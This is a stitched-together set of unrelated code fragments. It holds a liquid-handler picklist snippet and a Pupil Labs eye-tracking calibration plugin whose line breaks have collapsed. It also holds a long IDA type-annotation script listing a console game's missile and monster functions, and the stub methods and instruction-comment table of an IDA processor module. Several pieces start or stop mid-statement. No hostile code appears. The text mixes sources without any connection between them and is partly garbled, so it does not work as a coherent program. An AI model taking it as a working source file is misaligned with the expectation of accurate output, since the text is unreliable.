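    echo_run.load_source_plate("source_plate.csv", name_col="A", conc_col="B",
                               len_col="C", well_col="D", plate_col=None)
    echo_run.build_picklist_from_association_spreadsheet("associations.csv",
                                                         well_column="E")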
# -*- coding: utf-8 -*- """ Created on Tue Feb 25 17:36:52 2020 @author: bankslabHP """ """ (*)~--------------------------------------------------------------------------- Pupil - eye tracking platform Copyright (C) 2012-2020 Pupil Labs Distributed under the terms of the GNU Lesser General Public License (LGPL v3.0). See COPYING and COPYING.LESSER for license details. ---------------------------------------------------------------------------~(*) """ import cv2 import numpy as np from pyglui.cygl.utils import draw_points_norm, draw_polyline, RGBA from OpenGL.GL import GL_POLYGON from circle_detector import CircleTracker from calibration_routines.finish_calibration import finish_calibration import audio import os from pyglui import ui #from .calibration_plugin_base import Calibration_Plugin from calibration_routines.calibration_plugin_base import Calibration_Plugin from video_capture.realsense2_backend import Realsense2_Source # logging import logging logger = logging.getLogger(__name__) class My_Manual_Marker_Calibration(Calibration_Plugin): """ CircleTracker looks for proper markers Using at least 9 positions/points within the FOV Ref detector will direct one to good positions with audio cues Calibration only collects data at the good positions """ def __init__(self, g_pool): super().__init__(g_pool) self.pos = None self.smooth_pos = 0.0, 0.0 self.smooth_vel = 0.0 self.sample_site = (-2, -2) self.counter = 0 self.counter_max = 30 self.stop_marker_found = False self.auto_stop = 0 self.auto_stop_max = 30 self.menu = None self.ts_file = None self.ts_filename = [] self.circle_tracker = CircleTracker() self.markers = [] self.base_dir = [] #self.base_dir = '~/Desktop/agos_3d_calibration' def init_ui(self): super().init_ui() self.menu.label = "Manual Calibration" self.menu.append( ui.Info_Text("Calibrate gaze parameters using a handheld marker.") ) def start(self): super().start() audio.say("Starting {}".format(self.mode_pretty)) logger.info("Startingo {}".format(self.mode_pretty)) self.active = True self.ref_list = [] self.pupil_list = [] self.ts_filename = os.path.join(self.base_dir, f"marker_center.csv") print('BASE DIR: ' + self.ts_filename) self.ts_file = open(self.ts_filename,'a+') def stop(self): audio.say("Stopping {}".format(self.mode_pretty)) logger.info("Stoppingo {}".format(self.mode_pretty)) self.ts_file.close() self.screen_marker_state = 0 self.active = False self.smooth_pos = 0.0, 0.0 # self.close_window() self.button.status_text = "" if self.mode == "calibration": finish_calibration(self.g_pool, self.pupil_list, self.ref_list) elif self.mode == "accuracy_test": self.finish_accuracy_test(self.pupil_list, self.ref_list) super().stop() with open(self.ts_filename, 'a+') as self.ts_file: self.ts_file.close() def on_notify(self, notification): if notification.get("subject") == 'recording.started': self.base_dir = os.path.join(notification.get("rec_path"),'3d_calibration') os.makedirs(self.base_dir) """ Reacts to notifications: ``calibration.should_start``: Starts the calibration procedure ``calibration.should_stop``: Stops the calibration procedure Emits notifications: ``calibration.started``: Calibration procedure started ``calibration.stopped``: Calibration procedure stopped ``calibration.marker_found``: Steady marker found ``calibration.marker_moved_too_quickly``: Marker moved too quickly ``calibration.marker_sample_completed``: Enough data points sampled """ super().on_notify(notification) def recent_events(self, events): """ gets called once every frame. 
reference positon need to be published to shared_pos if no reference was found, publish 0,0 """ frame = events.get("frame") if self.active and frame: gray_img = frame.gray time_frame = self.g_pool.get_timestamp() # Update the marker self.markers = self.circle_tracker.update(gray_img) self.stop_marker_found = False if len(self.markers): # Set the pos to be the center of the first detected marker marker_pos = self.markers[0]["img_pos"] e = self.markers[0]["ellipses"] self.pos = self.markers[0]["norm_pos"] with open(self.ts_filename, 'a+') as self.ts_file: self.ts_file.write(str(time_frame) + ",") #self.ts_file.write(str(marker_pos[0]) + ',' + str(marker_pos[1]) + "\n") self.ts_file.write(str(e[0][0][0]) + ',' + str(e[0][0][1]) + ',' + str(e[1][1][0]) + ',' + str(e[1][1][1]) + ',' + str(e[0][2]) + "\n") #self.ts_file.write(str(e[0]) + "\n") # Check if there are stop markers for marker in self.markers: if marker["marker_type"] == "Stop": self.auto_stop += 1 self.stop_marker_found = True break else: self.pos = None # indicate that no reference is detected if self.stop_marker_found is False: self.auto_stop = 0 # Check if there are more than one markers if len(self.markers) > 1: audio.tink() logger.warning( "{} markers detected. Please remove all the other markers".format( len(self.markers) ) ) # tracking logic if len(self.markers) and not self.stop_marker_found: # start counter if ref is resting in place and not at last sample site # calculate smoothed manhattan velocity smoother = 0.3 smooth_pos = np.array(self.smooth_pos) pos = np.array(self.pos) new_smooth_pos = smooth_pos + smoother * (pos - smooth_pos) smooth_vel_vec = new_smooth_pos - smooth_pos smooth_pos = new_smooth_pos self.smooth_pos = list(smooth_pos) # manhattan distance for velocity new_vel = abs(smooth_vel_vec[0]) + abs(smooth_vel_vec[1]) self.smooth_vel = self.smooth_vel + smoother * ( new_vel - self.smooth_vel ) # distance to last sampled site sample_ref_dist = smooth_pos - np.array(self.sample_site) sample_ref_dist = abs(sample_ref_dist[0]) + abs(sample_ref_dist[1]) # start counter if ref is resting in place and not at last sample site if self.counter <= 0: if self.smooth_vel < 0.01 and sample_ref_dist > 0.1: self.sample_site = self.smooth_pos audio.beep() logger.debug( "Steady marker found. Starting to sample {} datapoints".format( self.counter_max ) ) self.notify_all( { "subject": "calibration.marker_found", "timestamp": self.g_pool.get_timestamp(), "record": True, } ) self.counter = self.counter_max if self.counter > 0: if self.smooth_vel > 0.01: audio.tink() logger.warning( "Marker moved too quickly: Aborted sample. Sampled {} datapoints. Looking for steady marker again.".format( self.counter_max - self.counter ) ) self.notify_all( { "subject": "calibration.marker_moved_too_quickly", "timestamp": self.g_pool.get_timestamp(), "record": True, } ) self.counter = 0 else: self.counter -= 1 ref = {} ref["norm_pos"] = self.pos ref["screen_pos"] = marker_pos ref["timestamp"] = frame.timestamp self.ref_list.append(ref) if self.counter <= 0: # last sample before counter done and moving on audio.tink() logger.debug( "Sampled {} datapoints. Stopping to sample. 
Looking for steady marker again.".format( self.counter_max ) ) self.notify_all( { "subject": "calibration.marker_sample_completed", "timestamp": self.g_pool.get_timestamp(), "record": True, } ) # Always save pupil positions self.pupil_list.extend(events["pupil"]) if self.counter: if len(self.markers): self.button.status_text = "Sampling Gaze Data" else: self.button.status_text = "Marker Lost" else: self.button.status_text = "Looking for Marker" # Stop if autostop condition is satisfied: if self.auto_stop >= self.auto_stop_max: self.auto_stop = 0 self.stop() else: pass def gl_display(self): """ use gl calls to render at least: the published position of the reference better: show the detected postion even if not published """ if self.active: draw_points_norm([self.smooth_pos], size=15, color=RGBA(1.0, 1.0, 0.0, 0.5)) if self.active and len(self.markers): # draw the largest ellipse of all detected markers for marker in self.markers: e = marker["ellipses"][-1] pts = cv2.ellipse2Poly( (int(e[0][0]), int(e[0][1])), (int(e[1][0] / 2), int(e[1][1] / 2)), int(e[-1]), 0, 360, 15, ) draw_polyline(pts, color=RGBA(0.0, 1.0, 0, 1.0)) if len(self.markers) > 1: draw_polyline( pts, 1, RGBA(1.0, 0.0, 0.0, 0.5), line_type=GL_POLYGON ) # draw indicator on the first detected marker if self.counter and self.markers[0]["marker_type"] == "Ref": e = self.markers[0]["ellipses"][-1] pts = cv2.ellipse2Poly( (int(e[0][0]), int(e[0][1])), (int(e[1][0] / 2), int(e[1][1] / 2)), int(e[-1]), 0, 360, 360 // self.counter_max, ) indicator = [e[0]] + pts[self.counter :].tolist()[::-1] + [e[0]] draw_polyline( indicator, color=RGBA(0.1, 0.5, 0.7, 0.8), line_type=GL_POLYGON ) # draw indicator on the stop marker(s) if self.auto_stop: for marker in self.markers: if marker["marker_type"] == "Stop": e = marker["ellipses"][-1] pts = cv2.ellipse2Poly( (int(e[0][0]), int(e[0][1])), (int(e[1][0] / 2), int(e[1][1] / 2)), int(e[-1]), 0, 360, 360 // self.auto_stop_max, ) indicator = [e[0]] + pts[self.auto_stop :].tolist() + [e[0]] draw_polyline( indicator, color=RGBA(8.0, 0.1, 0.1, 0.8), line_type=GL_POLYGON, ) else: pass def deinit_ui(self): """gets called when the plugin get terminated. This happens either voluntarily or forced. if you have an atb bar or glfw window destroy it here. """ if self.active: self.stop() super().deinit_ui() # # -*- coding: utf-8 -*- # """ # Created on Tue Feb 25 17:36:52 2020 # # @author: bankslabHP # """ # # """ # (*)~--------------------------------------------------------------------------- # Pupil - eye tracking platform # Copyright (C) 2012-2020 Pupil Labs # Distributed under the terms of the GNU # Lesser General Public License (LGPL v3.0). # See COPYING and COPYING.LESSER for license details. 
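# --- Editor's sketch: the marker-steadiness test used in recent_events -----
# recent_events() above decides when to start sampling by exponentially
# smoothing the marker position, tracking a smoothed Manhattan velocity, and
# requiring the marker to be (a) nearly still and (b) far enough from the
# previously sampled site. The constants (0.3, 0.01, 0.1) are the ones used
# above; this helper only restates that logic in isolation.
import numpy as np

def marker_is_steady(pos, smooth_pos, smooth_vel, sample_site,
                     smoother=0.3, vel_thresh=0.01, dist_thresh=0.1):
    """Return (is_steady, new_smooth_pos, new_smooth_vel)."""
    pos = np.asarray(pos, dtype=float)
    smooth_pos = np.asarray(smooth_pos, dtype=float)

    new_smooth_pos = smooth_pos + smoother * (pos - smooth_pos)
    step = new_smooth_pos - smooth_pos
    new_vel = abs(step[0]) + abs(step[1])                  # Manhattan velocity
    new_smooth_vel = smooth_vel + smoother * (new_vel - smooth_vel)

    ref_dist = np.abs(new_smooth_pos - np.asarray(sample_site)).sum()
    is_steady = new_smooth_vel < vel_thresh and ref_dist > dist_thresh
    return is_steady, new_smooth_pos, new_smooth_vel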
<gh_stars>10-100 del_items(0x801384E4) SetType(0x801384E4, "void GameOnlyTestRoutine__Fv()") del_items(0x801384EC) SetType(0x801384EC, "int vecleny__Fii(int a, int b)") del_items(0x80138510) SetType(0x80138510, "int veclenx__Fii(int a, int b)") del_items(0x8013853C) SetType(0x8013853C, "void GetDamageAmt__FiPiT1(int i, int *mind, int *maxd)") del_items(0x80138B34) SetType(0x80138B34, "int CheckBlock__Fiiii(int fx, int fy, int tx, int ty)") del_items(0x80138C1C) SetType(0x80138C1C, "int FindClosest__Fiii(int sx, int sy, int rad)") del_items(0x80138DB8) SetType(0x80138DB8, "int GetSpellLevel__Fii(int id, int sn)") del_items(0x80138E2C) SetType(0x80138E2C, "int GetDirection8__Fiiii(int x1, int y1, int x2, int y2)") del_items(0x80139048) SetType(0x80139048, "int GetDirection16__Fiiii(int x1, int y1, int x2, int y2)") del_items(0x80139264) SetType(0x80139264, "void DeleteMissile__Fii(int mi, int i)") del_items(0x801392BC) SetType(0x801392BC, "void GetMissileVel__Fiiiiii(int i, int sx, int sy, int dx, int dy, int v)") del_items(0x80139470) SetType(0x80139470, "void PutMissile__Fi(int i)") del_items(0x80139574) SetType(0x80139574, "void GetMissilePos__Fi(int i)") del_items(0x8013969C) SetType(0x8013969C, "void MoveMissilePos__Fi(int i)") del_items(0x80139804) SetType(0x80139804, "unsigned char MonsterTrapHit__FiiiiiUc(int m, int mindam, int maxdam, int dist, int t, int shift)") del_items(0x80139B78) SetType(0x80139B78, "unsigned char MonsterMHit__FiiiiiiUc(int pnum, int m, int mindam, int maxdam, int dist, int t, int shift)") del_items(0x8013A2D8) SetType(0x8013A2D8, "unsigned char PlayerMHit__FiiiiiiUcUc(int pnum, int m, int dist, int mind, int maxd, int mtype, int shift, int earflag)") del_items(0x8013AD44) SetType(0x8013AD44, "unsigned char Plr2PlrMHit__FiiiiiiUc(int pnum, int p, int mindam, int maxdam, int dist, int mtype, int shift)") del_items(0x8013B520) SetType(0x8013B520, "void CheckMissileCol__FiiiUciiUc(int i, int mindam, int maxdam, unsigned char shift, int mx, int my, int nodel)") del_items(0x8013B99C) SetType(0x8013B99C, "unsigned char GetTableValue__FUci(unsigned char code, int dir)") del_items(0x8013BA30) SetType(0x8013BA30, "void SetMissAnim__Fii(int mi, int animtype)") del_items(0x8013BB00) SetType(0x8013BB00, "void SetMissDir__Fii(int mi, int dir)") del_items(0x8013BB44) SetType(0x8013BB44, "void AddLArrow__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013BD24) SetType(0x8013BD24, "void AddArrow__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013BEE0) SetType(0x8013BEE0, "void GetVileMissPos__Fiii(int mi, int dx, int dy)") del_items(0x8013C004) SetType(0x8013C004, "void AddRndTeleport__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013C374) SetType(0x8013C374, "void AddFirebolt__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int micaster, int id, int dam)") del_items(0x8013C5E0) SetType(0x8013C5E0, "void AddMagmaball__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013C6F4) SetType(0x8013C6F4, "void AddTeleport__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013C8EC) SetType(0x8013C8EC, "void AddLightball__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013CA40) SetType(0x8013CA40, "void 
AddFirewall__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013CC28) SetType(0x8013CC28, "void AddFireball__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013CE84) SetType(0x8013CE84, "void AddLightctrl__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013CF6C) SetType(0x8013CF6C, "void AddLightning__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013D134) SetType(0x8013D134, "void AddMisexp__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013D340) SetType(0x8013D340, "unsigned char CheckIfTrig__Fii(int x, int y)") del_items(0x8013D424) SetType(0x8013D424, "void AddTown__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013D848) SetType(0x8013D848, "void AddFlash__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013DA58) SetType(0x8013DA58, "void AddFlash2__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013DC38) SetType(0x8013DC38, "void AddManashield__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013DD00) SetType(0x8013DD00, "void AddFiremove__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013DE5C) SetType(0x8013DE5C, "void AddGuardian__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013E2C8) SetType(0x8013E2C8, "void AddChain__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013E324) SetType(0x8013E324, "void AddRhino__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013E4E0) SetType(0x8013E4E0, "void AddFlare__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013E7D8) SetType(0x8013E7D8, "void AddAcid__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013E8DC) SetType(0x8013E8DC, "void AddAcidpud__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013E9B4) SetType(0x8013E9B4, "void AddStone__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013ECAC) SetType(0x8013ECAC, "void AddGolem__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013EE64) SetType(0x8013EE64, "void AddBoom__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013EEF8) SetType(0x8013EEF8, "void AddHeal__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F120) SetType(0x8013F120, "void AddHealOther__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F188) SetType(0x8013F188, "void AddElement__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F3B4) SetType(0x8013F3B4, "void AddIdentify__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, 
int id, int dam)") del_items(0x8013F464) SetType(0x8013F464, "void AddFirewallC__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F714) SetType(0x8013F714, "void AddInfra__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F810) SetType(0x8013F810, "void AddWave__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013F894) SetType(0x8013F894, "void AddNova__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013FAAC) SetType(0x8013FAAC, "void AddRepair__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013FB5C) SetType(0x8013FB5C, "void AddRecharge__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013FC0C) SetType(0x8013FC0C, "void AddDisarm__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013FC74) SetType(0x8013FC74, "void AddApoca__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8013FEB0) SetType(0x8013FEB0, "void AddFlame__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int seqno)") del_items(0x801400CC) SetType(0x801400CC, "void AddFlamec__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x801401BC) SetType(0x801401BC, "void AddCbolt__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int micaster, int id, int dam)") del_items(0x801403B0) SetType(0x801403B0, "void AddHbolt__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int micaster, int id, int dam)") del_items(0x80140570) SetType(0x80140570, "void AddResurrect__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x801405E4) SetType(0x801405E4, "void AddResurrectBeam__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8014066C) SetType(0x8014066C, "void AddTelekinesis__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x801406D4) SetType(0x801406D4, "void AddBoneSpirit__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x801408D0) SetType(0x801408D0, "void AddRportal__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x80140970) SetType(0x80140970, "void AddDiabApoca__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x80140AAC) SetType(0x80140AAC, "int AddMissile__Fiiiiiiciii(int sx, int sy, int v1, int v2, int midir, int mitype, int micaster, int id, int v3, int spllvl)") del_items(0x80140DF8) SetType(0x80140DF8, "int Sentfire__Fiii(int i, int sx, int sy)") del_items(0x80140FDC) SetType(0x80140FDC, "void MI_Dummy__Fi(int i)") del_items(0x80140FE4) SetType(0x80140FE4, "void MI_Golem__Fi(int i)") del_items(0x80141240) SetType(0x80141240, "void MI_SetManashield__Fi(int i)") del_items(0x8014127C) SetType(0x8014127C, "void MI_LArrow__Fi(int i)") del_items(0x80141A38) SetType(0x80141A38, "void MI_Arrow__Fi(int i)") del_items(0x80141C54) SetType(0x80141C54, "void MI_Firebolt__Fi(int i)") del_items(0x80142320) SetType(0x80142320, "void MI_Lightball__Fi(int 
i)") del_items(0x801425A8) SetType(0x801425A8, "void MI_Acidpud__Fi(int i)") del_items(0x801426B8) SetType(0x801426B8, "void MI_Firewall__Fi(int i)") del_items(0x8014297C) SetType(0x8014297C, "void MI_Fireball__Fi(int i)") del_items(0x80143340) SetType(0x80143340, "void MI_Lightctrl__Fi(int i)") del_items(0x801436BC) SetType(0x801436BC, "void MI_Lightning__Fi(int i)") del_items(0x801437A8) SetType(0x801437A8, "void MI_Town__Fi(int i)") del_items(0x801439E0) SetType(0x801439E0, "void MI_Flash__Fi(int i)") del_items(0x80143D34) SetType(0x80143D34, "void MI_Flash2__Fi(int i)") del_items(0x80143EFC) SetType(0x80143EFC, "void MI_Manashield__Fi(int i)") del_items(0x80144220) SetType(0x80144220, "void MI_Firemove__Fi(int i)") del_items(0x801444AC) SetType(0x801444AC, "void MI_Guardian__Fi(int i)") del_items(0x8014475C) SetType(0x8014475C, "void MI_Chain__Fi(int i)") del_items(0x801449C8) SetType(0x801449C8, "void MI_Misexp__Fi(int i)") del_items(0x80144CC8) SetType(0x80144CC8, "void MI_Acidsplat__Fi(int i)") del_items(0x80144E64) SetType(0x80144E64, "void MI_Teleport__Fi(int i)") del_items(0x8014522C) SetType(0x8014522C, "void MI_Stone__Fi(int i)") del_items(0x801453D8) SetType(0x801453D8, "void MI_Boom__Fi(int i)") del_items(0x801454D0) SetType(0x801454D0, "void MI_Rhino__Fi(int i)") del_items(0x8014587C) SetType(0x8014587C, "void MI_FirewallC__Fi(int i)") del_items(0x80145B04) SetType(0x80145B04, "void MI_Infra__Fi(int i)") del_items(0x80145BBC) SetType(0x80145BBC, "void MI_Apoca__Fi(int i)") del_items(0x80145E50) SetType(0x80145E50, "void MI_Wave__Fi(int i)") del_items(0x8014634C) SetType(0x8014634C, "void MI_Nova__Fi(int i)") del_items(0x8014660C) SetType(0x8014660C, "void MI_Flame__Fi(int i)") del_items(0x80146804) SetType(0x80146804, "void MI_Flamec__Fi(int i)") del_items(0x80146A8C) SetType(0x80146A8C, "void MI_Cbolt__Fi(int i)") del_items(0x80146D90) SetType(0x80146D90, "void MI_Hbolt__Fi(int i)") del_items(0x8014709C) SetType(0x8014709C, "void MI_Element__Fi(int i)") del_items(0x80147754) SetType(0x80147754, "void MI_Bonespirit__Fi(int i)") del_items(0x80147B5C) SetType(0x80147B5C, "void MI_ResurrectBeam__Fi(int i)") del_items(0x80147BCC) SetType(0x80147BCC, "void MI_Rportal__Fi(int i)") del_items(0x80147DF0) SetType(0x80147DF0, "void ProcessMissiles__Fv()") del_items(0x801481E4) SetType(0x801481E4, "void ClearMissileSpot__Fi(int mi)") del_items(0x8014829C) SetType(0x8014829C, "void MoveToScrollTarget__7CBlocks(struct CBlocks *this)") del_items(0x801482B0) SetType(0x801482B0, "void MonstPartJump__Fi(int m)") del_items(0x80148444) SetType(0x80148444, "void DeleteMonster__Fi(int i)") del_items(0x8014847C) SetType(0x8014847C, "int M_GetDir__Fi(int i)") del_items(0x801484D8) SetType(0x801484D8, "void M_StartDelay__Fii(int i, int len)") del_items(0x80148520) SetType(0x80148520, "void M_StartRAttack__Fiii(int i, int missile_type, int dam)") del_items(0x80148638) SetType(0x80148638,
in output file. 0 - empty file, -1 - write error """ r1 = qfile.write("Line 1\n") r2 = qfile.write("Line 2\n!") return 2 # two lines def create_func_frame(self, func_ea): """ Create a function frame for a newly created function. Set up frame size, its attributes etc. """ return False def is_far_jump(self, icode): """ Is indirect far jump or call instruction? meaningful only if the processor has 'near' and 'far' reference types """ return False def is_align_insn(self, ea): """ Is the instruction created only for alignment purposes? Returns: number of bytes in the instruction """ return 0 def outspec(self, ea, segtype): """ Generate text representation of an item in a special segment i.e. absolute symbols, externs, communal definitions etc. Returns: 1-overflow, 0-ok """ return 0 def get_frame_retsize(self, func_ea): """ Get size of function return address in bytes If this function is absent, the kernel will assume 4 bytes for 32-bit function 2 bytes otherwise """ return 3 def is_switch(self, swi): """ Find 'switch' idiom. Fills 'si' structure with information @return: Boolean (True if switch was found and False otherwise) """ return False def is_sp_based(self, op): """ Check whether the operand is relative to stack pointer or frame pointer. This function is used to determine how to output a stack variable This function may be absent. If it is absent, then all operands are sp based by default. Define this function only if some stack references use frame pointer instead of stack pointer. returns flags: OP_FP_BASED operand is FP based OP_SP_BASED operand is SP based OP_SP_ADD operand value is added to the pointer OP_SP_SUB operand value is substracted from the pointer """ return idaapi.OP_FP_BASED def notify_add_func(self, func_ea): """ The kernel has added a function. 
@param func_ea: function start EA @return: Nothing """ pass def notify_del_func(self, func_ea): """ The kernel is about to delete a function @param func_ea: function start EA @return: 1-ok,<=0-do not delete """ return 1 auto_comments = { "AD" : "add", "ADC" : "add with carry", "ADCI" : "add immediate with carry", "ADCIM" : "add immediate multi reg with", "ADCM" : "add multi reg with carry", "ADF" : "add floating point", "ADFM" : "add floating point multi reg", "ADI" : "add immediate", "ADIM" : "add immediate multi reg", "ADM" : "add multi reg", "AN" : "and", "ANI" : "and immediate", "ANM" : "and multi reg", "B" : "branch", "BE" : "branch on equal", "BF" : "bit flip", "BFM" : "bit flip multi reg", "BG" : "branch greater than", "BGE" : "branch greater than or equal", "BL" : "branch less than", "BLE" : "branch less than or equal", "BN" : "branch not equal", "BNO" : "branch not overflow", "BNS" : "branch not signed", "BO" : "branch on overflow", "BR" : "branch register", "BRA" : "branch absolute", "BRE" : "branch register on equal", "BRG" : "branch register on greater than", "BRGE" : "branch register on greater than or equal", "BRL" : "branch register on less than", "BRLE" : "branch register on less than or equal", "BRN" : "branch register on not equal", "BRNO" : "branch register on not overflow", "BRNS" : "branch register on not signed", "BRO" : "branch register on overflow", "BRR" : "branch relative", "BRS" : "branch register on signed", "BRSG" : "branch register on signed greater than", "BRSGE" : "branch register on signed greater than or equal", "BRSL" : "branch register on signed less than", "BRSLE" : "branch register on signed less than or equal", "BS" : "branch on signed", "BSG" : "branch on signed greater than", "BSGE" : "branch on signed greater than or equal", "BSL" : "branch on signed less than", "BSLE" : "branch on signed less than or equal", "C" : "call", "CAA" : "call absolute", "CAR" : "call relative", "CE" : "call on equal", "CG" : "call greater than", "CGE" : "call greater than or equal", "CL" : "call less than", "CLE" : "call less than or equal", "CM" : "compare", "CMF" : "compare floating point", "CMFM" : "compare floating point multi reg", "CMI" : "compare immediate", "CMIM" : "compare immediate multi reg", "CMM" : "compare multi reg", "CN" : "call not equal", "CNO" : "call not overflow", "CNS" : "call not signed", "CO" : "call on overflow", "CR" : "call register", "CRE" : "call register on equal", "CRG" : "call register greater than", "CRGE" : "call register greater than or equal", "CRL" : "call register less than", "CRLE" : "call register less than or equal", "CRN" : "call register not equal", "CRNO" : "call register not overflow", "CRNS" : "call register not signed", "CRO" : "call register on overflow", "CRS" : "call register on signed", "CRSG" : "call register on signed greater than", "CRSGE" : "call register on signed greater than or equal", "CRSL" : "call register on signed less than", "CRSLE" : "call register on signed less than or equal", "CS" : "call on signed", "CSG" : "call on signed greater than", "CSGE" : "call on signed greater than or equal", "CSL" : "call on signed less than", "CSLE" : "call on signed less than or equal", "DBRK" : "debug break", "DI" : "disable interrupts", "DMT" : "direct memory transfer", "DV" : "divide", "DVF" : "divide floating point", "DVFM" : "divide floating point multi reg", "DVI" : "divide immediate", "DVIM" : "divide immediate multi reg", "DVIS" : "divide immediate signed", "DVISM" : "divide immediate signed multi", "DVM" : "divide 
multi reg", "DVS" : "divide signed", "DVSM" : "divide signed multi reg", "EI" : "enable interrupts", "FTI" : "float to integer", "FTIM" : "float to integer multi reg", "HT" : "halt", "IR" : "interrupt return", "ITF" : "integer to float", "ITFM" : "integer to float multi reg", "LDS" : "load single", # "LDSD" : "load single and decrement", # "LDSI" : "load single and increment", "LDT" : "load tri", # "LDTD" : "load tri and decrement", # "LDTI" : "load tri and increment", "LDW" : "load word", # "LDWD" : "load word and decrement", # "LDWI" : "load word and increment", "MD" : "modulus", "MDF" : "modulus floating point", "MDFM" : "modulus floating point multi reg", "MDI" : "modulus immediate", "MDIM" : "modulus immediate multi reg", "MDIS" : "modulus immediate signed", "MDISM" : "modulus immediate signed multi", "MDM" : "modulus multi reg", "MDS" : "modulus signed", "MDSM" : "modulus signed multi reg", "MH" : "move high", "MI" : "move immediate tri-byte (macro for ML/MH)", "ML" : "move low", "MS" : "move low signed", "MU" : "multiply", "MUF" : "multiply floating point", "MUFM" : "multiply floating point multi reg", "MUI" : "multiply immediate", "MUIM" : "multiply immediate multi reg", "MUIS" : "multiply immediate signed", "MUISM" : "multiply immediate signed multi", "MUM" : "multiply multi reg", "MUS" : "multiply signed", "MUSM" : "multiply signed multi reg", "NG" : "negate", "NGF" : "negate floating point", "NGFM" : "negate floating point multi reg", "NGM" : "negate multi reg", "NT" : "not", "NTM" : "not multi reg", "OR" : "or", "ORI" : "or immediate", "ORM" : "or multi reg", "RE" : "return", "RF" : "read flags", "RL" : "rotate left", "RLI" : "rotate left immediate", "RLIM" : "rotate left immediate multi reg", "RLM" : "rotate left multi reg", "RMP" : "read memory protection", "RND" : "random", "RNDM" : "random multi reg", "RR" : "rotate right", "RRI" : "rotate right immediate", "RRIM" : "rotate right immediate multi reg", "RRM" : "rotate right multi reg", "SA" : "shift arithemetic right", "SAI" : "shift arithemetic right immediate", "SAIM" : "shift arithemetic right immediate multi reg", "SAM" : "shift arithemetic right multi reg", "SB" : "subtract", 